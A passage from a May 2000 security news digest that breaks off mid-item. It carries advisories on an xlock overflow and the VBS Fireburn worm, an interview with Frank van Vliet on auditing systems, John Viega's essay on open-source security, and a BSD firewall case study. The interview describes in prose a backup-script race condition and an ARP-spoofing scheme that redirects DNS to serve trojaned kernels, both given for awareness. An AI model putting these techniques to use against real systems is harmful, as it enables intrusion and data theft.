190.0 [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 31 May 2000 on 5:49 PM
The service gives European companies the opportunity to outsource
network intrusion detection instead of relying on internal security
experts. Defcom showed off its flagship European "alarm centre" in
Stockholm Monday -- from which a company's network security can
remotely monitored - and said that similar centres are currently being
tested in London and Berlin, and will be operational there after the
summer.
Link: ZDNet UK
http://www.zdnet.co.uk/news/2000/21/ns-15659.html
@HWA
191.0 [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 31 May 2000 on 5:48 PM
The Senate this month urged the Pentagon to study how it might use the
Army National Guard to make up for the shortage of computer
programmers and information security specialists.
Link: IDG
http://www.idg.net/ic_184044_1794_9-10000.html
@HWA
192.0 [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 31 May 2000 on 5:46 PM
Package: xlockmore-4.16 and earlier
The xlock program locks an X server until a valid password is entered.
The command line option -mode provides a user with a mechanism to
change the default display shown when the X server is locked. xlock is
installed with privileges to obtain password information, although
these are dropped as early as possible. An overflow in the -mode
command line option allows a malicious attacker to reveal arbitrary
portions of xlock's address space including the shadow password file.
Link: Linux Today
http://linuxtoday.com/news_story.php3?ltsn
@HWA
193.0 [HNS] May 31:NAI ON VBS FIREBURN WORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:37 PM
This is a VBS mass-mailing worm that uses Microsoft Outlook and mIRC
to propogate. This worm is a VBS program that is sent to all users in
the victim's address book and is attached to an email with varying
subject lines, depending on the language version of the host system
which sent the message. This worm contains a date activated payload
which disables the keyboard and mouse on June 20th.
Link: NAI advisory
http://vil.nai.com/villib/dispvirus.asp?virus_k
@HWA
194.0 [HNS] May 31:INTERNET GUARD DOG PRO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:35 PM
Last week McAfee Retail Software, a division of Network Associates,
Inc., announced McAfee Internet Guard Dog Pro, an all-in-one solution
containing a personal firewall and parental controls to keep children
safe while online.
Link: Press Release
http://net-security.org/cgi-bin/press/fullnews.cgi?newsid959697420,11489,
@HWA
195.0 [HNS] May 31: FRANK VAN VLIET INTERVIEW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:34 PM
LinuxSecurity.com has an interview with Frank van Vliet aka {}, the
author of AuditFile and the man who recently pointed out to
configuration errors on apache.org.
Link: LinuxSecurity.com
http://www.linuxsecurity.com/feature_stories/feature_story-47.html
Linux Security Interview with Frank van Vliet By Benjamin D. Thomas
5/30/2000 16:20
Frank van Vliet is the author of AuditFile, many security advisories, and
recently pointed out configuration errors on apache.org.
We thought our readers would be interested in an interview with Frank van
Vliet because of the recent paper he and Peter van Dijk released outlining
the steps they took to compromise apache.org. Their paper does not point
out any new vulnerabilities, it merely shows how simple configuration
errors can leave a system susceptible to attack. In this interview Frank
explains how he audits a systems security, major pitfalls administrators
fall into, and how he attempts to uncover bugs. We believe that everyone
can learn something from this interview. Note: Frank uses the alias {}
LinuxSecurity:When and how did you gain interest in security? How did you
gain your security knowledge?
Frank: When I finally switched from Windows to Linux, I spent a lot of
time studying the Linux kernel source. When I finished that one I knew C
enough to start coding on my own. I started working on my first security
project called Auditfile. A kernel patch making it possible to restrict
file access per process or per binary. This enabled me to run my apache
webserver only allowing it to read default libraries (/lib/*, /usr/lib/*),
read its configuration files, htdocs (wwwroot) directory, and only
allowing it to write to logfiles with no further access. At the same time
I took over control of the security focused group RooT66
http://root66.nl.eu.org and I joined ShellOracle
http://www.shelloracle.org. I spent hours reading various texts and joined
Buffer0verfl0w security http://b0f.freebsd.lublin.pl I also got involved
with projects like SecNet http://irc.secnet.org (not finished when writing
this). I have done some freelance security jobs for small webhosters
LinuxSecurity: When attempting to audit a systems security, what procedure
do you follow? Where do you begin? How do you normally gather information?
What comes next?
Frank: My approach changes as I gain more knowledge. Currently when
checking the security of a system, I start checking the file system (what
files are sundown or suidgroup, what files are accessible for what groups,
what files are world writable, are their any files with nonpublic
information world readable). Next, I try to find out what processes are
running as root. Of course the suid root processes are but there are also
crontabs or administrators around running binaries so I wrote some tools
live monitoring the processes running as root. When having a list of
binaries ran as root, I start checking every binary. Are there any known
security flaws in it? Are its configuration files and data files
accessible by nonroot? If nothing and I am really in the mood and the
binary isn't too big I would download the source of it (I really love
open-source) and read it to see if I can find any bugs in it.
LinuxSecurity: What are some of the major pitfalls Linux Administrators
fall into?
Frank: It is never enough to download all patches and updates and run
latest versions of your software. The group Buffer0verfl0w Security I am
in is constantly searching for new bugs in software.
Most admins play with things themselves and forget permissions on files or
other configuration faults. These things can be like the following backup
script:
#!/bin/bash for file in /home/* do tar -czf `echo $file | sed -e
's/\/home\///'`.tar.gz $file mv $file.tar.gz /verysecuredirectory/backups
done
Which means every home directory will be compressed into targz files in
the local directory then they got moved to the
/verysecuredirectory/backups. But because most umasks aren't set to make
new files 600 and most of the times it makes new files world readable, an
attack can gain all directories in /home if it just scans most common
directories the root is in for .tar.gz files and very fast copies most of
it to his own directories before the scripts move it (most of the time
this is while it is still compressing into that tar.gz file and it is
already readable.
Besides those race condition bugs like the previous ones, there are also
administrators that store backups in world readable.
And there are always the 'can I trust my network' things. Man in the
middle attacks are not very common but are very easy to perform,
especially when at the same network segment as the box you attack (could
be some other way more insecure box previously hacked). In worst case an
attacker on the same segment could broadcast arp who-has packets with the
ip of the nameserver the attacked box is using has the MAC address of my
NIC. That would mean when the attacked box would try to access the
nameserver, it will instead contact the box of the attacker and send its
name resolving questions. Then the attack can just reply normally except
for the kernel.org domain and have those names resolve to the ip of the
box of the attacker. Then have it set up just the same ftpserver as on any
other ftp kernel.org box and have it search trojaned Linux kernels and
then just wait for a new Linux kernel to be published.
LinuxSecurity: Have you exposed any other vulnerabilities, or written any
programs related to security?
Frank: Well, I wrote auditfile (still working on a newer version, as
always) I mentioned in the beginning of this interview that is at
http://root66.nl.eu.org/karin/auditfile-1.00.tar.gz. I found a bug and
wrote an exploit for bugzilla http://bugzilla.mozilla.org and working on
some other exploits and tools at the moment.
LinuxSecurity: How do you normally approach finding security
vulnerabilities and writing code to exploit them?
Frank: Every language has it's own sets of common bugs the programs can
have.
For C/C++ are mostly buffer overflows. The only way to find them is to
check every buffer in the program and search for any functions done on
that buffer and check everything if there is a possibility to exploit it.
I wrote some perl scripts to automate a part of this task which I normally
use to find the buffers, sizes of those buffers and possible insecure
functions (like strcpy and sprintf) done on those buffers, saving me a lot
of time finding normal overflows. The tricky ones require reading from
line 1 to like $ (last line).
For perl it are most of the time system or open functions that can be used
to execute commands (like system(finger $user) or open($user) where the
attacker can set the $user variable). So I normally search for all open,
system (system, exec, `, and so on) functions and check arguments to them.
Also database functions can be insecure.
I know people sending random feeds to their sendmail deamon and catch
crashes then backtrace to see what feed caused it and then work there way
back from there to the bug. Perhaps someday when I am that desperate to
find a bug in some high profile software I would do a thing like that,
until then I just read and most of the time you also learn by reading.
LinuxSecurity: What do you feel is the most important step in keeping a
network secure?
Frank: The integrity of the network can be spoiled if only one of the
boxes on the network got compromised by a nontrusted person. Most networks
get compromised because only one insecure box was on the network.
Administrators may want to consider an Intrusion Detection System to
monitor all machines on a network.
The most important step to keep a network secure is to keep all host
secure, this can be done by restricting as much as possible from outside
to the network (like only http connections to the httpserver and only ftp
connections to the ftpserver and so on) and having and IDS monitoring
network traffic.
LinuxSecurity: What do you think the most common Linux security
vulnerability is? How would you recommend an administrator fix this?
Frank: The possibility of easy exploiting of buffer overflows. Most buffer
overflows can be stopped by patches like the nonexecutable stack
http://www.openwall.com/linux and packetstorm to see my 2.3.99-pre5
version of it) patch for the Linux kernel and compiler addons like
stackguard.
LinuxSecurity: Do you think open-source software has the potential for
being more or less secure than closed-source software?
Frank: There are two sides to this story, if the same program was
available in both open and close sourced version. They are insecure at the
same rate. But because you get the source code of the open-source program
it is very easy to search for bugs. Then two things happen. The bugs get
reported and exploits are made for those bugs. This makes the open source
program having less bugs then the same closed source program but also
there are more exploits around and there will be more bugs to be found in
the future. This doesn't say it is impossible to disassemble the closed
source program and find the bugs in that one too. Then the same happens
for the close source version but at a slower rate because the source is
harder to get and to read (would be ASM instead of easy C or some other
fancy language).
Open source software is more secure than closed source because good coders
can use disassembling techniques on closed source programs to find
vulnerabilities. I would rather have the open source version so it can
compiled with stackguard.
LinuxSecurity: What do you think motivates "black hats" to damage/destruct
systems?
Frank: It is the kick of gaining access and power motivating the "black
hats" to hack systems. The damage and destruct is most of the times done
in 2 parts. One part is to make sure they keep their full access and so
most binaries are Trojan and so on. This can be because they are mad at
the company they just hacked(they wouldn?t pay them for revealing the
security bugs they exploited or some other in my opinion lame reason) or
just because they really don't care and just want to show off (like the
recent DDS attacks).
LinuxSecurity: How do you feel about the mass-media's portrayal of
'hacking'?
Frank: Most media focuses on the things done by stupid kids mass attacking
big servers with DDS networks or doing other stupid things. This does take
the heat off the real hackers. The real hackers that don't hack and don't
want to be disturbed at their work of endless coding and tracing through
programs. It was because Hardball and I wanted to make a statement about
consideration of configuration. The media got us a little attention, we
would still be unknown doing endless coding.
LinuxSecurity: What do you see is in the future for information security?
Frank: I would love to see administrators think twice before installing
things on their boxes. Also, having kids on your company network is the
last thing you want, especially when they try to trojan your sshdeamon and
mess up making some boxes even unusable and forcing to full reinstall of
everything because you don't know what was trojanned and what was not.
LinuxSecurity: We would like to take a moment to thank Frank for taking
time out of his busy schedule to share some of his experiences with us. If
you have any questions reguarding this interview, please feel free to drop
us an email. As always, if you have any ideas for other interviews, or any
suggestions, please let us know. We want to serve you!
@HWA
196.0 [HNS] May 31: MISSING FILES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:32 PM
Auckland software developer, Phil Saleh, who found a security flaw in
MS Outlook that he believes could secretly unleash a "hell virus",
says files on his discovery have been stolen from his computer.
Link: NZ Herald
http://www.nzherald.co.nz/storydisplay.cfm?storyID
Real story at this url was abducted by aliens.
@HWA
197.0 [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:32 PM
An author of the open source Mailman program explains why open source
is not as secure as you might think - using security holes in his own
code as an example.
Link: Developer.com
http://developer.earthweb.com/journal/techfocus/052600_security.html
May 26, 2000 The Myth of Open Source Security by John Viega An author of
the open source Mailman program explains why open source is not as secure
as you might think � using security holes in his own code as an example.
Open source software projects can be more secure than closed source
projects. However, the very things that can make open source programs
secure � the availability of the source code, and the fact that large
numbers of users are available to look for and fix security holes � can
also lull people into a false sense of security.
Many eyeballs The core open source phenomenon responsible for making
code secure is the "many eyeballs" effect. With lots of people
scrutinizing a program's source code, bugs � and security problems � are
more likely to be found.
Why do programmers look at source code? Mostly for their own benefit:
they've found a piece of open source software useful, and they want to
improve or change it for their own specific needs. Sometimes too, source
code attracts scrutiny just to make sure it meets certain needs, even when
there's no intention of modifying it. Companies which require a high level
of security, for example, might do a code review as part of a security
audit. This could be done for any software product where the source is
available, of course, regardless of whether it's open source or produced
commercially.
--------------------------------------------------------------------------
------ Everyone using Mailman, apparently, assumed that someone else had
done the proper security auditing.
--------------------------------------------------------------------------
------
Source code can also attract programmers' eyeballs simply for reasons of
personal gain. Some people may explicitly wish to find security problems
in the code. Perhaps they want to build a name for themselves in the
security community. Maybe they're motivated by altruism or a belief that
others should be aware of security holes. Earlier this month, for example,
two hackers broke into the open source Apache Software Foundation Web
site, posted a Microsoft logo on it, and then published an explanation of
how an improperly configured Apache server allowed them access. Many
others share information about security vulnerabilities in less intrusive
ways, such as posting to discussions on the Bugtraq mailing list. And,
unfortunately, there will probably always be some people scrutinizing
source code because they want an attack that no one else has � in which
case, you're not likely to gain much from their eyeballs.
Eyes that look do not always see With people motivated to look at
the source code for any number of reasons, it's easy to assume that open
source software is likely to have been carefully scrutinized, and that
it's secure as a result. Unfortunately, that's not necessarily true.
Lots of things can discourage people from reviewing source code. One
obvious deterrent: if the code looks like a big tangled mess, you'll get
fewer eyeballs on it. And as we discovered while writing Mailman, the GNU
mailing list manager, anything that makes it harder for the average open
source user to hack means fewer eyeballs. We wrote Mailman in Python,
which is nowhere near as popular as C, and often heard from people who
would have liked to help with the development, but did not want to have to
learn Python to do it.
People using open source programs are most likely to look at the source
code when they notice something they'd like to change. Unfortunately, that
doesn't mean the program gets free security audits by people good at such
things. It gets eyeballs looking at the parts of the code they want to
change. Often, that's only a small part of the code. What's more,
programmers preoccupied with adding a feature generally aren't thinking
much about security when they're looking at the code.
And, unfortunately, software developers sometimes have a tendency to
ignore security up front and try to bolt it on afterwards. Even worse,
most developers don't necessarily know much about security. Many
programmers know a bit about buffer overflows, and are probably aware of a
handful of functions that should be avoided. But many of them don't
understand buffer overflows enough to avoid problems beyond the handful of
dangerous calls they know. And when it comes to flaws other than buffer
overflows, the problem gets worse. For example, it is common for
developers to use cryptography, but misapply it in ways that destroy the
security of a system, and it is also common for developers to add subtle
information leaks to their programs accidently. It's really common to use
encryption that is too weak and can easily be broken. It's also common for
people to exchange cryptography keys in a way that's actually insecure.
People often try to hand roll their own protocols using common
cryptographic primitives. But cryptographic protocols are generally more
complex than one would expect, and are easy to get wrong.
Far too trusting So despite the conventional wisdom, the fact that
many eyeballs are looking at a piece of software is not likely to make it
more secure. It is likely, however, to make people believe that it is
secure. The result is an open source community that is probably far too
trusting when it comes to security.
--------------------------------------------------------------------------
------ Until this week, the version of Mailman which contains these
security holes was included in Red Hat Professional Linux version 6.2.
--------------------------------------------------------------------------
------
Take the case of the open source mailing list manager Mailman, which I
helped write. Mailman is in use running mailing lists at an impressive
number of sites. For three years, until March 2000, Mailman had a handful
of glaring security problems in code that I wrote before I knew much about
security. An attacker could use these security holes to gain access to the
operating system on Linux computers running the program.
These were not obscure bugs: anyone armed with the Unix command grep and
an iota of security knowledge could have found them in seconds. Even
though Mailman was downloaded and installed thousands of times during that
time period, no one reported a thing. I finally realized there were
problems as I started to learn more about security. Everyone using
Mailman, apparently, assumed that someone else had done the proper
security auditing, when, in fact, no one had.
And if three years seems like a long time for security holes to go
undetected, consider the case of Kerberos, an Open Source security
protocol for doing authentication. According to Ken Raeburn, one of the
developers of the MIT Kerberos implementation, some of the buffer
overflows recently found in that package have been there for over ten
years.
The many eyeballs approach clearly failed for Mailman. And as open source
programs are increasingly packaged and sold as products, users �
particularly those who are not familiar with the open source world � may
well assume that the vendor they are buying the product from has done some
sort of security check on it.
Until this week, for example, version 1.0 of Mailman, which contains these
security holes, was included in Red Hat Professional Linux version 6.2.
(If you're running a Mailman version earlier than 2.0 beta, allow me to
suggest that you upgrade immediately. The latest version can be found on
the Mailman Web site at http://www.list.org).
The Myth of Open Source Security by John Viega Security: tougher than it
looks Even if you get the right kind of people doing the right kinds of
things, you may have problems that you never hear about. Security problems
are often incredibly subtle, and may span large parts of a source tree. It
is not uncommon to have two or three features spread throughout a program,
none of which constitutes a security problem alone, but which can be used
together to perform a security breach. For example, two buffer overflows
recently found in Kerberos version 5 could only be exploited when used in
conjunction with each other.
As a result, doing security reviews of source code tends to be complex and
boring, since you generally have to look at a lot of code, and understand
it pretty well. Even many experts don't like to do these kinds of reviews.
And even the experts can miss things. Consider the case of the popular
open source FTP server wu-ftpd. In the past two years, several very subtle
buffer overflow problems have been found in the code. Almost all of these
problems had been in the code for years, despite the fact that the program
had been examined many times by both hackers and security auditors. If any
of them had discovered the problems, they didn't announce it publicly. In
fact, the wu-ftpd has been used as a case study for vulnerability
detection techniques that never identified these problems as definite
flaws. One tool was able to identify one of the problems as potentially
exploitable, but researchers examined the code thoroughly for a couple of
days, and came to the conclusion that there was no way that the problem
identified by their tool could actually be exploited. Over a year later,
they learned that they were wrong, when an expert audit finally did turn
up the problem.
In code with any reasonable complexity, it can be very difficult to find
bugs. The wu-ftpd is less than 8000 lines of code long, but it was easy
for several bugs to remain hidden in that small space over long periods of
time.
To compound the problem, even when people know about security holes, they
may not get fixed, at least not right away. Even when identified, the
security problems in Mailman took many months to fix, because security was
not the the core development team's most immediate concern. In fact, the
team believes one problem still persists in the code, but only in a
configuration that we suspect doesn't get used.
An army in my belly The single most pernicious problem in computer
security today is the buffer overflow. While the availability of source
code has clearly reduced the number of buffer overflow problems in open
source programs, according to several sources, including CERT, buffer
overflows still account for at least a quarter of all security advisories,
year after year.
Open source proponents sometimes claim that the "many eyeballs" phenomenon
prevents Trojan horses from being introduced in open source software. The
speed with which the TCP wrappers Trojan was discovered in early 1999 is
sometimes cited as supporting evidence. This too can lull the open source
movement into a false sense of security, however, since the TCP wrappers
Trojan is not a good example of a truly stealthy Trojan horse: the code
was glaringly out of place and obviously put there for malicious purposes
only. It was as if the original Trojan horse had been wheeled into Troy
with a sign attached that said, "I've got an army in my belly!"
Well-crafted Trojans are quite different. They generally look like
ordinary bugs with security implications, and are very subtle. Take, for
example, wu-ftpd. Who is to say that one of the buffer overflows that have
been found recently was not a Trojan horse introduced years ago when the
distribution site was hacked?
The open source movement hasn't made the problem of buffer overflows go
away. But eventually, newer programming languages may; unlike C, modern
programming languages like Java or Python never have buffer overflow
problems, because they do automatic bounds checking on array accesses. As
with any technology, fixing the root of the problem is far more effective
than any ad hoc solution.
Is closed source any more secure? Critics of open source software
might say that providing source code makes the job of the malicious
attacker easier. If only a binary is available, the bar has been raised
high enough to send most such people looking for lower-hanging fruit. But
as the many well-publicized security holes in commercial software make
clear, attackers can find problems without the source code; it just takes
longer. From a security point of view, the advantages of having the source
code available for everyone to see far outweighs any benefit hackers may
gain.There are many benefits of open source software unrelated to
security. And the "many eyeballs" effect does have the potential to make
open source software more secure than proprietary systems. Currently,
however, the benefits open source provides in terms of security are vastly
overrated, because there isn't as much high-quality auditing as people
believe, and because many security problems are much more difficult to
find than people realize. Open source programs which appeal to a limited
audience are particularly at risk, because of the smaller number of
eyeballs looking at the code. But all open source software is vulnerable,
and the open source movement can only benefit by paying more attention to
security.
Resources
The Mailman web site. http://www.list.org/ The ITS4 security
scanner for C code. http://www.rstcorp.com/its4 Software security for
developers. http://www.ibm.com/developer/security CERT web site.
http://www.cert.org/
@HWA
198.0 [HNS] May 31:INFORMATION SHARING MECHANISM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:31 PM
The group, known as an "information sharing mechanism," will enable
high technology companies to share data anonymously about software
vulnerabilities and systems attacks.
Link: Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename
Url was eaten by my dog
@HWA
199.0 [HNS] May 31:WAP RELATED DEFACEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:30 PM
t looks like probably the first site created for usage with WAP
(Wireless Application Protocol) was defaced. WAP version of Italian
Wappi web site (http://wap.wappi.com) was changed by De
Meestervervalser. Just a note - It cannot be seen by a normal browser,
but you could see it from Gelon trough their emulator.
Link: Site seen with Nokia GSM
Link: Screenshot (21kb)
It looks like probably the first site created for usage with WAP
(Wireless Application Protocol) was defaced. WAP version of Italian
Wappi web site (http://wap.wappi.com) was changed by De
Meestervervalser. Just a note - It cannot be seen by a normal browser,
but you could see it from Gelon trough their emulator.
http://www.gelon.net/cgi-bin/wapalize.cgi?url
http://wap.wappi.com
http://www.net-security.org/misc/wap2805.jpg
@HWA
200.0 [HNS] May 31:RUNNING A BSD-BASED FIREWALL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:30 PM
Internet security is currently a hot topic. Because of that, many
smaller networks are turning toward firewalls to give them some
protection. Many of these networks do not have the money to pay for a
commercial firewall product, so they are moving to free Unix-based
firewalls such as IP Firewall, IP Filter or IPChains.
Link: BSD Today
http://www.bsdtoday.com/2000/May/Features165.html
Running a BSD-based Firewall FreeBSD vs. OpenBSD as a firewall platform.
By Jim O'Gorman
Introduction
Internet security is currently a hot topic. Because of that, many smaller
networks are turning toward firewalls to give them some protection. Many
of these networks do not have the money to pay for a commercial firewall
product, so they are moving to free Unix-based firewalls such as IP
Firewall, IP Filter or IPChains.
The company I work for was in a similar situation. I hope to give you some
insight of why we chose the product we did, where we started, what we
learned from the initial installation and also what we've changed to
improve management of the network. I am not going to explain firewall rule
sets at all. That is too large of a topic. For that I would suggest
getting the book "Firewalls and Internet Security" by Cheswick and
Bellovin (ISBN 0201633574) and consulting the documentation of the
firewall product you decide to go with.
Also, in this paper I will state what worked best for us at the time. What
might work best for us in a year may be different. Just like what will
work best for you now may be different from what we chose. Take the
information in this paper, add it to information drawn elsewhere and form
your own conclusion for what will be best for you. Also, keep in mind that
because I may have decided that your favorite OS may not have been best
for me, it is not an insult to you. Don't view OS's as a religion, because
they are only tools. Nothing more. Use the best one for a given job and
let it stay at that.
Commercial Firewalls vs. Open Source Firewalls
The first bridge that we had to cross was getting people to accept an open
source firewall package. Everyone knows and trusts products like
Checkpoint and Cisco's Pix firewall. A firewall is a key part of the
security infrastructure. It is a stretch to ask management to trust a
product, they may have never heard of, for such an important part of the
network.
When you buy a commercial firewall product, you are not buying a better
quality product, but only paying for a name. That name gives your
management and you confidence that there is a strong, solid company behind
your firewall. With an open source firewall, you do not get that name.
However, you do get the equivalent credibility through the very nature of
open source. Anyone that uses it will be more than happy to tell you the
good and the bad that they have gone through with the product.
The other bonus is that open source firewalls are usually written by
people that are using the product themselves. This gives them every
incentive in the world of making it work right. Plus, with the open source
model you can influence the direction of the program. Darren Reed of IP
Filter has impressed me many times over with his openness to add features
that users have asked for. You do not find that with a bigger commercial
company.
Our Firewall product
I am a BSD guy. That is the platform I know best. With that in mind, there
are two popular free firewalls we could pick from: IP Filter and IP
Firewall. IP Firewall is a fine product that I have used in the past with
success, but at the time it could not keep state. A stateful firewall was
a requirement for this particular project, so we decided to go with IP
Filter (http://coombs.anu.edu.au/~avalon/).
There is a bit of a religious war about stateful vs. non-stateful (packet
filter) firewalls. Don't take my word for which is better. Look through
the book referenced above to see which would work best for you. I prefer
to stay with a stateful firewall, because it allows me to only allow the
initial Syn packet through. Then the firewall will allow the rest of that
TCP session through. This prevents things like stealth scans from getting
through your network.
IP Filter is a nice, small, and efficient firewall that comes with the
base OS of FreeBSD, OpenBSD, and NetBSD. It also runs on Solaris, SunOS,
BSD/OS, Irix, and HP/UX. The cross platform nature of the product was a
big feather in its cap. It would allow us to go with one Unix today,
switch to a different Unix in the future, and still keep the same firewall
product. The next question was: What platform are we going to run this
product on?
Base OS
As previously stated, I am a BSD guy. So we came right out looking at
FreeBSD and OpenBSD. Since this was a smaller installation, I was looking
forward to using an OS which I was not as familiar with. I am more
familiar with FreeBSD, which was a strike against it and gave OpenBSD a
leg up.
The other big issue supporting OpenBSD is the way it is marketed. If you
go to http://www.openbsd.org they will be more than happy to tell you that
they have "Three years without a remote hole in the default install!" and
"Two years without a localhost hole in the default install!". That is very
impressive. You do not go that long without a root exploit by luck. This
shows a focus by the OpenBSD developers to make the default install of
OpenBSD secure. Plus, IP Filter is the default firewall with OpenBSD so it
makes getting up and running with OpenBSD very quick.
With the hard core security that drives the OpenBSD project along with the
chance to work with something new in mind, we decided that OpenBSD would
be a good choice for a BSD-based IP Filter firewall.
Implementation
This is where the fun really is, in setting up the firewall itself. After
the install of OpenBSD, all you have to do is enable IP Filter and plug in
your rule set. The best source of information for setting up IP Filter is
in the OpenBSD FAQ at http://www.openbsd.org/faq/faq6.html. Follow those
instructions and you should be up and going in no time. The only real
thing you should watch is when you write your rule sets. You really have
to understand IP. Otherwise you are very likely to open up a hole in the
network.
Testing
After the firewall is installed and the rules are written, the most
important thing is testing. You cannot setup a firewall, throw it on the
network and assume it works.
Testing the NAT (Network Address Translation) is very easy. Simply plug a
machine on the internal interface and see if it works. SSH into a box on a
remote network, do a "who" and see what IP it says you are coming from.
Really, NAT is kind of nice in the regard that it either works or does
not.
The firewall, however, is a different story. There is really no right way
of testing it. What we did was go through the rule set and double check
all the rules. After that, from a remote network we ran Nessus
(http://www.nessus.org/), Nmap (http://www.insecure.org/nmap/index.html)
and Saint (http://www.wwdsi.com/saint/) against our public IP range. You
may have some different preferred tools to use for this purpose. The key
is to be creative. Try what you would do if you were trying to break into
that network. Use the tools that crackers trying to break in would use.
After you have things looking good, you must remember to test every couple
of months. No firewall is ever done. As new attacks come out, you must
make sure you are defended against them.
Results and Changes
What we found was that the initial install went fine. The firewall was
secure, the NAT worked great, and everyone was happy. Then the time came
when we wanted to upgrade IP Filter to the newest version. That is when we
ran into a bit of trouble. Upgrading was important to us because we wanted
to have access to IP Filter's newest features and bug fixes.
After some searching around, we ran into e-mails such as this one:
http://www.false.net/ipfilter/2000_02/0004.html. The short of them is that
it is not suggested practice to install IP Filter from source on OpenBSD,
and it is doubtful it would even work. Instead, what users are suppose to
do is upgrade OpenBSD to -current, where the maintainer of the IP Filter
section should have the newest version integrated into the source tree.
This was an issue for us. Running -current on any type of production
server, much less something as key as a firewall, is not something that
should be done. For those not familiar with the way BSDs work, -current is
the up-to-when-you-cvsup current snapshot of the source tree of the OS.
There is no guarantee that it will work, be bug free or even compile.
-current is a work in progress for developers to use, and not intended for
production use.
So, in order to upgrade IP Filter on OpenBSD on our production firewalls
we were left with two choices: either run not-yet-ready-for-production
code or to not upgrade at all. Because of the chances of a problem with IP
Filter coming out in the future, we decided to change to FreeBSD. FreeBSD
would allow us to track -stable (a branch of the source tree meant for
production use), and allow us to upgrade IP Filter from source when ever
we felt like it.
The Change
Once you break down what you actually do on a firewall that is maintained
by someone that understands firewalls, many of OpenBSD strengths don't
matter. Let's give a couple of "for instances" to make sure that my point
is being made clear.
A home user, who may not understand Unix well, may best be served by
running OpenBSD as a firewall platform. The reason for this is that the
home user can do a default OpenBSD install and feel good in the fact that
even if he does not know enough to turn off services, he will be at least
a little protected by the fact there has been no root exploits for quite
some time. True, a box is only as secure as the administrator makes it,
but this type of user is not likely to change much of anything. In which
case, the secure-by-default install will help them. Plus, a user like this
is not likely to want to upgrade their install until the next version
upgrade comes out, so the inflexibility of IP Filter on OpenBSD should not
hurt them.
For a use like ours, however, where the administrator will go over the box
and shutdown the services they will never need, and no user logs in on the
firewall, there is not much that OpenBSD will give you. OpenBSD and
FreeBSD both running IP Filter, with SSH as the only other service, will
be equally secure. If there are no other remote services running, there is
no other way into the box.
With no loss in security while gaining the flexibility of being able to
upgrade IP Filter whenever needed, there was no reason not to use FreeBSD.
With those facts in mind, we made the switch of OpenBSD to FreeBSD.
Justification
The upgrade was very simple. Install FreeBSD, install the newest IP
Filter, copy over the rule sets, and we were done. With the rule set
already written, there is really not much else to do.
Shortly after we finished the upgrade, we felt justified for our decision.
In this e-mail, http://false.net/ipfilter/2000_05/0091.html, an IP Filter
user had found a bug that may have been used to exploit an IP Filter
install. If this exploit had been developed then there would have been a
hole in our firewall. If we had still been on OpenBSD, we would have had
to choose between running -current or sticking with the old, buggy,
version of IP Filter.
The Future
The lesson learned here is that you cannot listen to marketing, even open
source marketing. Even though OpenBSD is known as "the secure OS," and a
firewall is an application where you would want the utmost security, the
product marketed towards that niche may not be the best choice for the
application. The best thing to do is ignore the marketing, look at all the
facts, and decide what is best for your install.
Hopefully in the future, there will be an easier way to upgrade IP Filter
under OpenBSD. Even if they make one, I do not see any reason for us to
switch back. Switching back would gain us nothing. We will see what the
future brings and the direction of both BSD projects and IP Filter change
that might affect the way we do things. An important thing about computers
in general is nothing is static, as new products come out and existing
products change, you have to go with what is best at the time.
More Info
IP Filter - http://coombs.anu.edu.au/~avalon/ IPF(8) Manual Page
from FreeBSD - http://www.bsdtoday.com/2000/May/supplement166.html inetd
and inetd.conf: Managing your system's internet switchboard operator -
http://www.bsdtoday.com/2000/March/Tutorials19.html
@HWA
201.0 [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 1:09 AM
Five laptop computers worth about $30,000 have been stolen from
Parliament House in what appears to have been an inside job. The
laptops could allow access to the parliamentary network, a Senate
committee heard today.
Link: Australian IT
http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.html
Laptops stolen from Parliament AAP
FIVE laptop computers worth about $30,000 have been stolen from Parliament
House in what appears to have been an inside job.
The laptops could allow hackers access to the parliamentary network, a
Senate committee heard today. They were taken over a short period of
time from secured areas at parliament.
Parliamentary official Robert Alison said the laptops appeared to have
been taken by parliamentary workers or visitors with security clearance.
"It seems strange to me that four or five computers would disappear in a
short time, which says to me that there may be a market for them," Mr
Alison said.
"One of the concerns is that all five of those computers were taken from
what we call the private areas of Parliament House, so presumably the
person or persons who took them was a passholder of some sort."
Mr Alison, the Usher of the Black Rod, said the laptops were protected by
passwords but acknowledged their contents were not 100 per cent safe.
@HWA
202.0 [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:58 AM
More than 45,000 viruses infect PCs running the Windows operating
system worldwide. By contrast, perhaps 35 viruses have been written
for the Macintosh and four or five for the Unix-based computers that
